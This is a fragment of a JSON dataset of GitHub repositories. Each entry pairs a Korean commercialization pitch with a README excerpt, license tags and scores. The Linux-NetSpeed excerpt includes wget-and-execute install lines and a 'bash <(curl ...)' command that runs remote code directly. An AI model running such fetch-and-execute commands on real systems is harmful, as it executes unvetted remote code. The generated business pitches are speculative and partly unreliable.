teams.*\n\n**One-click deploy:**\n\n[![Deploy on Railway](https://railway.com/button.svg)](https://railway.com/deploy/palacms?referralCode=RCPU7k)\n\n![screenshot](https://cdn.primo.page/f52960e1-0bb0-4c64-9f70-5a9994ce95fc/staging/_images/1739675414227Screenshot%202025-02-15%20at%2010.10.10%E2%80%AFPM.png)\n\n## The shape of it\n\nOne G","composite_score":0.0245,"license_safety_tag":"safe"},{"name":"facebook/dataloader","github_url":"https://github.com/facebook/dataloader","stars":7,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Facebook DataLoader 상용화 분석\n\n## 왜 보물인가\n여러 데이터 출처를 효율적으로 통합하여 애플리케이션 성능을 크게 향상시킬 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품정보, 재고, 가격을 여러 시스템에서 동시에 불러와 빠르게 고객에게 표시하는 SaaS 서비스\n2. **소셜미디어 관리 도구*","readme_excerpt":"# DataLoader\n\nDataLoader is a generic utility to be used as part of your application's data\nfetching layer to provide a simplified and consistent API over various remote\ndata sources such as databases or web services via batching and caching.\n\n[![Build Status](https://github.com/graphql/dataloader/actions/workflows/validation.yml/badge.svg)](https://github.com/graphql/dataloader/actions/workflows/validation.yml)\n[![Coverage Status](https://coveralls.io/repos/graphql/dataloader/badge.svg?branch=master&service=github)](https://coveralls.io/github/graphql/dataloader?branch=main)\n\nA port of the \"Loader\" API originally developed by [@schrockn][] at Facebook in\n2010 as a simplifying force to coalesce the sundry key-value store back-end\nAPIs which existed at the time. At Facebook, \"Loader\" became one of the\nimplementation details of the \"Ent\" framework, a privacy-aware data entity\nloading and caching layer within web server product code. This ultimately became\nthe underpinning for Facebook's ","composite_score":0.0244,"license_safety_tag":"safe"},{"name":"ylx2016/Linux-NetSpeed","github_url":"https://github.com/ylx2016/Linux-NetSpeed","stars":5,"language":"Shell","license":"GPL-2.0","abandonment_months":0,"description":"# Linux-NetSpeed 상용화 분석\n\n## 왜 보물인가\n인터넷 속도를 측정하고 최적화하는 리눅스 전용 도구로, 서버 운영 회사들이 네트워크 문제를 빠르게 진단할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 호스팅 회사의 자동 진단 SaaS**\n- 고객 서버의 네트워크 속도를 자동으로 측정하고 리포트하는 웹 대시보드 서비스\n\n**2. 데이","readme_excerpt":"赞助\n<br>\n支付宝\n<br>\n![20200312144201.png](https://vip1.loli.io/2020/03/12/7IJvKaTcrLBDbtz.png)\n\n[搬瓦工在线库存查询](https://bwg.ylx.me/)\n\n\n预先准备\n```\ncentos：yum install ca-certificates wget -y && update-ca-trust force-enable\n```\n```\ndebian/ubuntu：apt-get install ca-certificates wget -y && update-ca-certificates\n```\n不卸载内核版本\n\n```\nwget -O tcpx.sh \"https://github.com/ylx2016/Linux-NetSpeed/raw/master/tcpx.sh\" && chmod +x tcpx.sh && ./tcpx.sh\n```\n\n卸载内核版本(停更)\n```\nwget -O tcp.sh \"https://github.com/ylx2016/Linux-NetSpeed/raw/master/tcp.sh\" && chmod +x tcp.sh && ./tcp.sh\n```\n关联action自动编译内核\n\n[https://github.com/ylx2016/kernel/](https://github.com/ylx2016/kernel/)\n\n尝试加入参数直接调用优化 ./tcpx.sh op1(对应32) (不会判断系统) op3(对应38)\n\nip质检\n```\nbash <(curl -Ls IP.Check.Place)\n```\n\n双持bbr+锐速\n<br>\nbbr 添加\n```\necho \"net.core.default_qdisc=fq\" >> /etc/sysctl.d/99-sysctl.conf\n```\n```\necho \"net.ipv4.tcp_congestion_control=bbr\" >> /etc/sysctl.d/99-sysctl.conf\n```\n```\nsysctl -p\n```\n编辑锐速文件\n```\nnano /appex/etc/config\n```\n检测代码有BUG，如果锐速正常 运","composite_score":0.0242,"license_safety_tag":"restricted"},{"name":"monitor1394/unity-ugui-XCharts","github_url":"https://github.com/monitor1394/unity-ugui-XCharts","stars":6,"language":"C#","license":"MIT","abandonment_months":0,"description":"# Unity UGUI XCharts 저장소 분석\n\n## 왜 보물인가\n게임이나 앱에서 데이터를 시각적인 그래프와 차트로 보여주는 도구로, 복잡한 숫자를 한눈에 이해하기 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임 내 통계 대시보드**: 모바일 게임에서 플레이어의 점수, 진행도, 성과를 실시간 차트로 표시하는 서비스\n2. **내부 업무 도구*","readme_excerpt":"\n<h2 align=\"center\">XCharts</h2>\n<p align=\"center\">\nA powerful, easy-to-use, configurable charting and data visualization library for Unity.<br/>Unity数据可视化图表插件。<br/>\n<a href=\"README-en.md\">English README</a>\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/XCharts-Team/XCharts/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/XCharts-Team/XCharts\"></img>\n  </a>\n  <a href=\"https://github.com/XCharts-Team/XCharts/releases\">\n    <img src=\"https://img.shields.io/github/v/release/XCharts-Team/XCharts?include_prereleases\"></img>\n  </a>\n  <a href=\"https://github.com/XCharts-Team/XCharts\">\n    <img src=\"https://img.shields.io/github/repo-size/monitor1394/unity-ugui-xcharts\"></img>\n  </a>\n  <a href=\"https://github.com/XCharts-Team/XCharts\">\n    <img src=\"https://img.shields.io/github/languages/code-size/monitor1394/unity-ugui-xcharts\"></img>\n  </a>\n  <a href=\"https://xcharts-team.github.io/docs/tutorial01\">\n    <img src=\"https://img.shields.io/badge/Unity-5.6+-green","composite_score":0.0241,"license_safety_tag":"safe"},{"name":"geekdada/yasd","github_url":"https://github.com/geekdada/yasd","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# geekdada/yasd 분석\n\n## 왜 보물인가\n저장소 이름과 설명 정보 부족으로 정확한 가치 판단이 어렵지만, MIT 라이선스 오픈소스로 자유로운 상용화가 가능한 기술 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 협업 도구 SaaS**: 프로그래밍 작업을 효율화하는 클라우드 서비스로 월 구독 모델 제공\n2. **기업 내부 개발 플랫폼**:","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/geekdada/yasd\">\n    <img width=\"300\" src=\"public/github-banner.png\" alt=\"logo\">\n  </a>\n</p>\n\n# Surge Web Dashboard (formerly YASD)\n\n![Github Actions][github-actions-image]\n[![Test coverage][codecov-image]][codecov-url]\n[![Known Vulnerabilities][snyk-image]][snyk-url]\n\n[codecov-image]: https://codecov.io/gh/geekdada/yasd/branch/master/graph/badge.svg\n[codecov-url]: https://codecov.io/gh/geekdada/yasd\n[snyk-image]: https://snyk.io/test/github/geekdada/yasd/badge.svg\n[snyk-url]: https://snyk.io/test/github/geekdada/yasd\n[github-actions-image]: https://github.com/geekdada/yasd/workflows/Node%20CI/badge.svg\n\n[中文](/README_zh-CN.md) | [English](/README.md)\n\n## What is Surge Web Dashboard?\n\nWe are happy to announce Surge Web Dashboard (formerly YASD) has joined Surge! This project will remain open-source and active.\n\nStarting from Surge iOS 4.4.0 and Surge Mac 4.0.0, Surge added support for [HTTP API](https://manual.nssurge.com/others/http-api.h","composite_score":0.0241,"license_safety_tag":"safe"},{"name":"remotemobprogramming/mob","github_url":"https://github.com/remotemobprogramming/mob","stars":8,"language":"Go","license":"MIT","abandonment_months":1,"description":"# remotemobprogramming/mob 분석\n\n## 왜 보물인가\n여러 사람이 함께 실시간으로 코드를 작성할 수 있게 도와주는 도구로, 원격으로 팀이 협력해야 하는 현대 회사들에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 구독하는 협업 IDE(코드 작성 공간) 플랫폼으로 월간 사용료 모델 운영\n2. **내부 업","readme_excerpt":"# Fast git handover with mob\n\n![mob Logo](logo_def.svg)\n<p align=\"center\">\n  <a href=\"https://github.com/remotemobprogramming/mob/actions/workflows/ci.yaml?query=branch%3Amain\">\n    <img alt=\"Test Workflow\" src=\"https://img.shields.io/github/actions/workflow/status/remotemobprogramming/mob/ci.yaml?branch=main\"></a>\n  <a href=\"https://github.com/remotemobprogramming/mob/graphs/contributors\">\n    <img alt=\"Contributors\" src=\"https://img.shields.io/github/contributors/remotemobprogramming/mob\" /></a>\n  <a href=\"https://github.com/remotemobprogramming/mob/releases\">\n    <img alt=\"Downloads\" src=\"https://img.shields.io/github/downloads/remotemobprogramming/mob/total\" /></a>\n  <a href=\"https://github.com/remotemobprogramming/mob/releases\">\n    <img  alt=\"Downloads of latest\" src=\"https://img.shields.io/github/downloads/remotemobprogramming/mob/latest/total\" /></a>\n  <a href=\"https://img.shields.io/github/stars/remotemobprogramming/mob\">\n    <img alt=\"Stars\" src=\"https://img.shields.io/github","composite_score":0.024,"license_safety_tag":"safe"},{"name":"megaease/easegress","github_url":"https://github.com/megaease/easegress","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# Easegress 상용화 분석\n\n## 왜 보물인가\n인터넷 서비스의 입구에서 트래픽을 똑똑하게 관리해주는 '교통정리 시스템'으로, 기업의 서버 안정성과 성능을 대폭 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여러 고객의 요청을 공정하게 분배하고 보안을 강화하는 중간 관리자 역할로 판매\n2. **내부 업무 도구**: ","readme_excerpt":"# Easegress  <!-- omit from toc -->\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/easegress-io/easegress)](https://goreportcard.com/report/github.com/easegress-io/easegress)\n[![GitHub Workflow Status (branch)](https://img.shields.io/github/actions/workflow/status/easegress-io/easegress/test.yml?branch=main)](https://github.com/easegress-io/easegress/actions/workflows/test.yml)\n[![codecov](https://codecov.io/gh/easegress-io/easegress/branch/main/graph/badge.svg?token=5Q80B98LPI)](https://codecov.io/gh/easegress-io/easegress)\n[![Docker pulls](https://img.shields.io/docker/pulls/megaease/easegress.svg)](https://hub.docker.com/r/megaease/easegress)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/easegress-io/easegress)](https://github.com/easegress-io/easegress/blob/main/go.mod)\n[![Join Easegress Slack](https://img.shields.io/badg","composite_score":0.024,"license_safety_tag":"safe"},{"name":"Roblox/luau","github_url":"https://github.com/Roblox/luau","stars":7,"language":"C++","license":"MIT","abandonment_months":0,"description":"# Roblox/luau 사업화 분석\n\n## 왜 보물인가\n로블록스라는 세계적인 게임 플랫폼에서 사용하는 공식 프로그래밍 언어로, 수백만 명의 게임 개발자들이 필요로 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 SaaS**: 초보자부터 전문가까지 Luau 프로그래밍을 배우는 온라인 강좌 플랫폼\n2. **로블록스 게임 제작 내부 ","readme_excerpt":"Luau ![CI](https://github.com/luau-lang/luau/actions/workflows/build.yml/badge.svg) [![codecov](https://codecov.io/gh/luau-lang/luau/branch/master/graph/badge.svg)](https://codecov.io/gh/luau-lang/luau)\n====\n\nLuau (lowercase u, /ˈlu.aʊ/) is a fast, small, safe, gradually typed embeddable scripting language derived from [Lua](https://lua.org).\n\nIt is designed to be backwards compatible with Lua 5.1, as well as incorporating [some features](https://luau.org/compatibility) from future Lua releases, but also expands the feature set (most notably with type annotations and a state-of-the-art type inference system). Luau is largely implemented from scratch, with the language runtime being a very heavily modified version of Lua 5.1 runtime, with completely rewritten interpreter and other [performance innovations](https://luau.org/performance). The runtime mostly preserves Lua 5.1 API, so existing bindings should be more or less compatible with a few caveats.\n\nLuau is used by Roblox game develo","composite_score":0.024,"license_safety_tag":"safe"},{"name":"codezjx/netease-cloud-music-dl","github_url":"https://github.com/codezjx/netease-cloud-music-dl","stars":7,"language":"Python","license":"MIT","abandonment_months":1,"description":"# 네이스 클라우드 뮤직 다운로더 (codezjx/netease-cloud-music-dl)\n\n## 왜 보물인가\n음악 스트리밍 서비스에서 음악을 자신의 기기에 저장할 수 있게 해주는 도구로, 인터넷 없이도 음악을 듣고 싶은 사람들에게 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 음악 관리 SaaS**: 구독 중인 음악을 자동으로 백업하고","readme_excerpt":"# 网易云音乐下载器\n基于Python3.X编写的网易云音乐命令行下载器，自动下载专辑封面，记录歌手名、音乐标题、专辑名等元数据，并写入[ID3 Tags][1] metadata容器。在github上试了几个高星的下载器都没有写入专辑封面，对于强迫症患者简直不能忍，于是一怒之下决定自己写。\n\n## Preview\n![Preview](preview.gif)\n\n## Installation\n\n若没有安装Python3，请先到官网下载并安装：\n> https://www.python.org/download/releases/3.0/\n\n\n首先下载源码：\n```bash\n$ git clone https://github.com/codezjx/netease-cloud-music-dl.git\n```\n\n进入根目录，然后执行：\n```bash\n$ python3 setup.py install\n```\n\n最终显示以下log，表示顺利安装：\n```\nrunning install\nrunning bdist_egg\nrunning egg_info\n...\n...\nFinished processing dependencies for netease-cloud-music-dl==x.x.x\n```\n\n后续直接在命令行中通过`ncm`指令即可快速调用相关功能，**Warning: 目前只支持Python3.x版本**\n\n## Feature\n- 支持下载专辑封面并嵌入MP3文件\n- 支持写入歌手名、音乐标题、专辑名等信息至[ID3 Tags][1]\n- 支持跳过已下载的音频文件\n- 支持常见设置选项，如：保存路径、音乐命名格式、文件智能分类等\n- 默认下载比特率为320k的高品质音乐（若木有320k则会自动下载最高比特率）\n- 支持下载单首/多首歌曲\n- 支持下载歌手热门单曲（可配置最大下载数）\n- 支持下载专辑所有歌曲\n- 支持下载公开歌单所有歌曲\n- 支持下载播客/电台所有节目\n\n**（注意：已下架的音乐暂时无法下载）**\n\n通过`ncm -h`即可查看所支持的参数列表：\n```\n$ ncm -h\nusage: ncm [-h] [-s song_id] [-ss song_ids [song_ids ...]] [-hot artist_id]","composite_score":0.0239,"license_safety_tag":"safe"},{"name":"qvacua/vimr","github_url":"https://github.com/qvacua/vimr","stars":7,"language":"Swift","license":"mit","abandonment_months":1,"description":"# VimR 프로젝트 분석\n\n## 왜 보물인가\n복잡한 텍스트 편집 작업을 빠르게 처리하려는 개발자와 글쟁이들이 원하는 강력한 편집 도구를 현대적으로 재해석한 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 코딩 IDE 서비스**: 브라우저 기반 개발 환경에 강력한 편집 기능을 추가한 SaaS 플랫폼\n2. **팀 협업 문서 작성 도구**: 마크다","readme_excerpt":"# VimR — Neovim GUI for macOS\n\n[Download](https://github.com/qvacua/vimr/releases) • [Documentation](https://github.com/qvacua/vimr/wiki)\n\n![Screenshot 1](https://raw.githubusercontent.com/qvacua/vimr/develop/resources/screenshot1.png)\n![Screenshot 2](https://raw.githubusercontent.com/qvacua/vimr/develop/resources/screenshot2.png)\n\n## About\n\nVimR is a Neovim GUI for macOS written in Swift.\n\nThe goal is to build an editor that uses Neovim inside with some of the convenient\nGUI features similar to those present in other editors.\n\nThere are other Neovim GUIs for macOS,\nsee the [list](https://github.com/neovim/neovim/wiki/Related-projects#gui), so why VimR?\n\n- Play around with [Neovim](https://github.com/qvacua/neovim),\n- Play around with the main idea of Redux architecture, and\n- (most importantly) have fun!\n\nIf you feel chatty, there is a chat room: <https://matrix.to/#/#vimr:matrix.org>\n\nIf you want to support VimR financially, use [Github's Sponsor](https://github.com/sponsors/qvacua).","composite_score":0.0237,"license_safety_tag":"safe"},{"name":"uber-common/jvm-profiler","github_url":"https://github.com/uber-common/jvm-profiler","stars":7,"language":"Java","license":"NOASSERTION","abandonment_months":1,"description":"# jvm-profiler 상용화 분석\n\n## 왜 보물인가\nJava 애플리케이션의 성능 문제를 자동으로 진단해주는 도구로, 소프트웨어 속도가 느려지는 이유를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 성능 모니터링 SaaS**: 기업의 Java 서버 건강 상태를 실시간으로 점검하고 병목 지점을 자동 보고\n2. **개발사 내부 도","readme_excerpt":"# Uber JVM Profiler\n\n[![Build Status](https://api.travis-ci.org/uber-common/jvm-profiler.svg)](https://travis-ci.org/uber-common/jvm-profiler/)\n\nUber JVM Profiler provides a Java Agent to collect various metrics and stacktraces for Hadoop/Spark JVM processes \nin a distributed way, for example, CPU/Memory/IO metrics. \n\nUber JVM Profiler also provides advanced profiling capabilities to trace arbitrary Java methods and arguments on \nthe user code without user code change requirement. This feature could be used to trace HDFS name node call latency \nfor each Spark application and identify bottleneck of name node. It could also trace the HDFS file paths each Spark \napplication reads or writes and identify hot files for further optimization.\n\nThis profiler is initially created to profile Spark applications which usually have dozens of or hundreds of \nprocesses/machines for a single application, so people could easily correlate metrics of these different \nprocesses/machines. It is also a gener","composite_score":0.0237,"license_safety_tag":"unknown"},{"name":"Col-E/Recaf","github_url":"https://github.com/Col-E/Recaf","stars":7,"language":"Java","license":"mit","abandonment_months":0,"description":"# Recaf (Col-E/Recaf) 분석\n\n## 왜 보물인가\nJava 프로그램을 분석하고 수정할 수 있는 전문 도구로, 소프트웨어 보안 검사나 프로그램 개선이 필요한 기업들에게 매우 실용적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 Java 프로그램 보안 검사를 웹에서 수행하는 온라인 분석 플랫폼\n2. **내부 업무 도구**","readme_excerpt":"# Recaf [![Discord](https://dcbadge.limes.pink/api/server/https://discord.gg/Bya5HaA?style=flat)](https://discord.gg/Bya5HaA) [![codecov](https://codecov.io/gh/Col-E/Recaf/graph/badge.svg?token=N8GslpI1lL)](https://codecov.io/gh/Col-E/Recaf)  ![downloads](https://img.shields.io/github/downloads/Col-E/Recaf/total.svg) [![Contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](CONTRIBUTING.md)\n\n![Recaf 4x UI](recaf.png)\n\nAn easy to use modern Java bytecode editor that abstracts away the complexities of Java programs.\n\n## Download\n\n- [Launcher](https://github.com/Col-E/Recaf-Launcher)\n  - Usage & instructions found on the launcher repo\n- [Snapshot releases](https://github.com/Col-E/Recaf-Launcher/blob/master/MANUAL.md)\n  - See [CI actions](https://github.com/Col-E/Recaf/actions/workflows/build.yml) for release artifacts\n- [Independent releases](https://github.com/Col-E/Recaf/releases) _(None for 4X currently)_\n\n## Features\n\n- Edit Java byteco","composite_score":0.0237,"license_safety_tag":"safe"},{"name":"utam0k/youki","github_url":"https://github.com/utam0k/youki","stars":12,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# youki 저장소 분석\n\n## 왜 보물인가\n컨테이너(프로그램을 안전하게 격리 실행하는 기술)를 효율적으로 관리하는 핵심 엔진으로, 클라우드 서비스 업체들이 필수적으로 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 호스팅 서비스**: 고객들의 프로그램을 안전하게 분리 실행하는 기반 기술로 활용\n- **API 판매**: 컨테이너 관리 API","readme_excerpt":"# youki: A container runtime in Rust\n\n[![Discord](https://img.shields.io/discord/849943000770412575.svg?logo=discord)](https://discord.gg/zHnyXKSQFD)\n[![GitHub contributors](https://img.shields.io/github/contributors/containers/youki)](https://github.com/containers/youki/graphs/contributors)\n[![Github CI](https://github.com/containers/youki/actions/workflows/basic.yml/badge.svg?branch=main)](https://github.com/containers/youki/actions)\n[![codecov](https://codecov.io/gh/containers/youki/branch/main/graph/badge.svg)](https://codecov.io/gh/containers/youki)\n\n<p align=\"center\">\n  <img src=\"docs/youki.png\" width=\"450\">\n</p>\n\n**youki** is an implementation of the [OCI runtime-spec](https://github.com/opencontainers/runtime-spec) in Rust, similar to [runc](https://github.com/opencontainers/runc).  \nYour ideas are welcome [here](https://github.com/containers/youki/issues/10).\n\n# 🏷️ About the name\n\nyouki is pronounced as /joʊki/ or yoh-key.\nyouki is named after the Japanese word 'youki', which ","composite_score":0.0236,"license_safety_tag":"safe"},{"name":"doctrine/inflector","github_url":"https://github.com/doctrine/inflector","stars":11,"language":"PHP","license":"mit","abandonment_months":2,"description":"# doctrine/inflector 사업화 분석\n\n## 왜 보물인가\n영어 단어를 자동으로 다양한 형태로 변환해주는 도구로, 데이터베이스나 웹 서비스에서 필요한 자동화 작업을 손쉽게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 자동 데이터 분류 시스템에서 사용자가 입력한 카테고리명을 자동으로 복수형, 단수형으로 변환하여 통일","readme_excerpt":"# Doctrine Inflector\n\nDoctrine Inflector is a small library that can perform string manipulations\nwith regard to uppercase/lowercase and singular/plural forms of words.\n\n[![Build Status](https://github.com/doctrine/inflector/workflows/Continuous%20Integration/badge.svg)](https://github.com/doctrine/inflector/actions?query=workflow%3A%22Continuous+Integration%22+branch%3A4.0.x)\n[![Code Coverage](https://codecov.io/gh/doctrine/inflector/branch/2.0.x/graph/badge.svg)](https://codecov.io/gh/doctrine/inflector/branch/2.0.x)\n","composite_score":0.0234,"license_safety_tag":"safe"},{"name":"wal-g/wal-g","github_url":"https://github.com/wal-g/wal-g","stars":10,"language":"Go","license":"NOASSERTION","abandonment_months":0,"description":"# wal-g/wal-g 기술 평가\n\n## 왜 보물인가\n데이터베이스의 중요한 정보를 안전하게 백업하고 복구할 수 있는 도구로, 대규모 시스템을 운영하는 기업들이 매우 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 데이터베이스 백업 서비스**: 중소기업을 위해 자동으로 데이터를 주기적으로 저장하는 구독형 서비스\n2. **대기업 내부 ","readme_excerpt":"# WAL-G\n![Docker-tests-status](https://github.com/wal-g/wal-g/workflows/Docker%20tests/badge.svg)\n![Unit-tests-status](https://github.com/wal-g/wal-g/workflows/Unit%20tests/badge.svg)\n[![Go Report Card](https://goreportcard.com/badge/github.com/wal-g/wal-g)](https://goreportcard.com/report/github.com/wal-g/wal-g)\n[![Documentation Status](https://readthedocs.org/projects/wal-g/badge/?version=latest)](https://wal-g.readthedocs.io/?badge=latest)\n\n[This documentation is also available at wal-g.readthedocs.io](https://wal-g.readthedocs.io)\n\nWAL-G is an archival restoration tool for PostgreSQL, MySQL/MariaDB, and MS SQL Server (beta for MongoDB and Redis).\n\nWAL-G is the successor of WAL-E with a number of key differences. WAL-G uses LZ4, LZMA, ZSTD, or Brotli compression, multiple processors, and non-exclusive base backups for Postgres. More information on the original design and implementation of WAL-G can be found on the Citus Data blog post [\"Introducing WAL-G by Citus: Faster Disaster Re","composite_score":0.0234,"license_safety_tag":"unknown"},{"name":"prest/prest","github_url":"https://github.com/prest/prest","stars":5,"language":"Go","license":"MIT","abandonment_months":1,"description":"# prest/prest 분석 보고서\n\n## 왜 보물인가\n데이터베이스를 웹 서비스로 자동 변환해주는 도구로, 복잡한 코딩 없이 기존 데이터를 즉시 활용 가능하게 만듭니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업의 간단한 데이터 관리 시스템을 빠르게 구축하고 월 구독으로 판매\n2. **내부 업무 도구**: 대기업의 레거시 데이터베","readme_excerpt":"# pRESTd\n\n[![Tests](https://github.com/prest/prest/actions/workflows/test.yml/badge.svg)](https://github.com/prest/prest/actions/workflows/test.yml)\n[![GoDoc](https://godoc.org/github.com/prest/prest?status.png)](https://godoc.org/github.com/prest/prest)\n[![Go Report Card](https://goreportcard.com/badge/github.com/prest/prest)](https://goreportcard.com/report/github.com/prest/prest)\n[![codecov](https://codecov.io/gh/prest/prest/branch/main/graph/badge.svg?token=eVD9urwIEv)](https://codecov.io/gh/prest/prest)\n[![Homebrew](https://img.shields.io/badge/dynamic/json.svg?url=https://formulae.brew.sh/api/formula/prestd.json&query=$.versions.stable&label=homebrew)](https://formulae.brew.sh/formula/prestd)\n[![Discord](https://img.shields.io/badge/discord-prestd-blue?logo=discord)](https://discord.gg/JnRjvu39w8)\n\n_p_**REST** (**P**_ostgreSQL_ **REST**), is a simple production-ready API, that delivers an instant, realtime, and high-performance application on top of your **existing or new Postgre","composite_score":0.0233,"license_safety_tag":"safe"},{"name":"leits/MeetingBar","github_url":"https://github.com/leits/MeetingBar","stars":5,"language":"Swift","license":"Apache-2.0","abandonment_months":1,"description":"# MeetingBar 상용화 분석\n\n## 왜 보물인가\n회의 일정을 한눈에 보고 빠르게 참여할 수 있는 도구로, 바쁜 직장인들의 시간 낭비를 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형으로 Zoom, Teams, Google Meet 일정을 한 곳에서 관리하는 멀티플랫폼 회의 앱\n2. **내부 업무 도구**: 대기업 IT팀이","readme_excerpt":"[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner-direct-single.svg)](https://stand-with-ukraine.pp.ua)\n\n[![GitHub license](https://img.shields.io/github/license/leits/MeetingBar.svg)](https://github.com/leits/MeetingBar/blob/master/LICENSE)\n[![Translation state](https://hosted.weblate.org/widgets/meetingbar/-/app/svg-badge.svg)](https://hosted.weblate.org/engage/meetingbar/)\n[![Github all releases](https://img.shields.io/github/downloads/leits/MeetingBar/total.svg)](https://GitHub.com/leits/MeetingBar/releases/)\n[![Made in Ukraine](https://img.shields.io/badge/made_in-ukraine-ffd700.svg?labelColor=0057b7)](https://stand-with-ukraine.pp.ua)\n\n**MeetingBar** is a menu-bar app for your calendar meetings (macOS 10.15+).\n\nIntegrated with 50+ meeting services so you can quickly join meetings from an event or create ad-hoc meetings.\n\n<img src=\"https://github.com/leits/MeetingBar/blob/master/screenshot.png\" width=\"700\">\n\n<a href=\"https://www.prod","composite_score":0.0232,"license_safety_tag":"safe"},{"name":"nicehash/NiceHashMinerLegacy","github_url":"https://github.com/nicehash/NiceHashMinerLegacy","stars":13,"language":"Rich Text Format","license":"NOASSERTION","abandonment_months":1,"description":"# NiceHash Miner Legacy 사업화 분석\n\n## 왜 보물인가\n암호화폐 채굴을 자동으로 관리해주는 소프트웨어로, 일반인도 컴퓨터로 돈을 벌 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 채굴 수익 관리 대시보드 → 사용자가 월 구독으로 최적화된 채굴 설정을 받음\n2. **내부 업무 도구**: 기업의 유휴 ","readme_excerpt":"# NiceHash Miner\n\n- [Introduction](#introduction)\n- [What are the benefits?](#benefits)\n- [Features](#features)\n- [Requirements](#requirements)\n- [How to get&run it?](#run)\n- [Where is the profit coming from?](#profit)\n- [How to run NiceHash Miner only when profitability is high enough?](#highprofit)\n- [Additional options](#options)\n- [Troubleshooting](#troubleshooting)\n- [How to report bugs and issues?](#bugs)\n\n# <a name=\"introduction\"></a> Introduction\n\nNiceHash Miner is a continuation of NiceHash Miner Legacy. This version is intended for beginners or experienced miners that want the quickest updates and highest hashrates, and are okay with customization of the antivirus. Please check out quick [guide](https://www.nicehash.com/guide/nicehash-miner-user-guide) about NiceHash Miner, so that your experience will be even better.\n\n<img src=\"Resources/NHM_screenshot.PNG\" />\n\nPlease follow us on Twitter <a href=\"https://twitter.com/NiceHashMining\" target=\"_blank\">@NiceHashMining</a> or on ","composite_score":0.0231,"license_safety_tag":"unknown"},{"name":"PlasmNetwork/Astar","github_url":"https://github.com/PlasmNetwork/Astar","stars":7,"language":"Rust","license":"GPL-3.0","abandonment_months":0,"description":"# Astar 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 일반 사람들도 쉽게 사용할 수 있도록 만든 플랫폼으로, 암호화폐와 웹3 서비스의 대중화를 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 기업들이 자체 디지털 자산 거래 플랫폼을 쉽게 구축하도록 제공\n2. **NFT 발행 관리 도구**: 미술관, 박물관이 자신","readme_excerpt":"![astar-cover](https://user-images.githubusercontent.com/40356749/135799652-175e0d24-1255-4c26-87e8-447b192fd4b2.gif)\n\n<div align=\"center\">\n\n[![Integration Action](https://github.com/AstarNetwork/Astar/workflows/Integration/badge.svg)](https://github.com/AstarNetwork/Astar/actions)\n[![GitHub tag (latest by date)](https://img.shields.io/github/v/tag/AstarNetwork/Astar)](https://github.com/AstarNetwork/Astar/tags)\n[![Substrate version](https://img.shields.io/badge/Substrate-3.0.0-brightgreen?logo=Parity%20Substrate)](https://substrate.dev/)\n[![License](https://img.shields.io/github/license/AstarNetwork/Astar?color=green)](https://github.com/AstarNetwork/Astar/blob/production/shiden/LICENSE)\n <br />\n[![Twitter URL](https://img.shields.io/twitter/follow/AstarNetwork?style=social)](https://twitter.com/AstarNetwork)\n[![Twitter URL](https://img.shields.io/twitter/follow/ShidenNetwork?style=social)](https://twitter.com/ShidenNetwork)\n[![YouTube](https://img.shields.io/youtube/channel/subscribe","composite_score":0.023,"license_safety_tag":"restricted"},{"name":"Amog-OS/AmogOS","github_url":"https://github.com/Amog-OS/AmogOS","stars":19,"language":"","license":"NOASSERTION","abandonment_months":1,"description":"# AmogOS 저장소 분석\n\n## 왜 보물인가\n가벼운 운영체제를 직접 만드는 오픈소스 프로젝트로, 컴퓨터의 기본 구조를 이해하거나 맞춤형 시스템을 필요로 하는 사람들에게 교육 자료이자 실제 활용 자산이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육 플랫폼 SaaS**: 프로그래밍 입문자를 위한 온라인 과정에서 \"운영체제 만들기\" 실습 환경으","readme_excerpt":"# AmogOS\nA parody OS inspired by Among Us ඞ. (pronounced A-mog-O-S)\n\n<img src=\"https://i.postimg.cc/vmF8tTVH/120727498-ecfc5e00-c497-11eb-9f92-a1b99318fee1.png\"/> <img src=\"https://i.postimg.cc/m2Ym9qXt/130533968-d797e83d-e643-4c62-9264-7d46c2b67b48.png\"/>\n\n## General Info\n\nThis was mostly inspired by [this reddit post](https://www.reddit.com/r/linuxmint/comments/n9h7b4/amogos_custom_background_mint_x_grey_theme/). AmogOS is a meme OS based on the hit game Among Us, in the same vein as Hannah Montana Linux, but it's also developed and made to be a lightweight operating system. AmogOS is also less bloated than some other distros (*cough 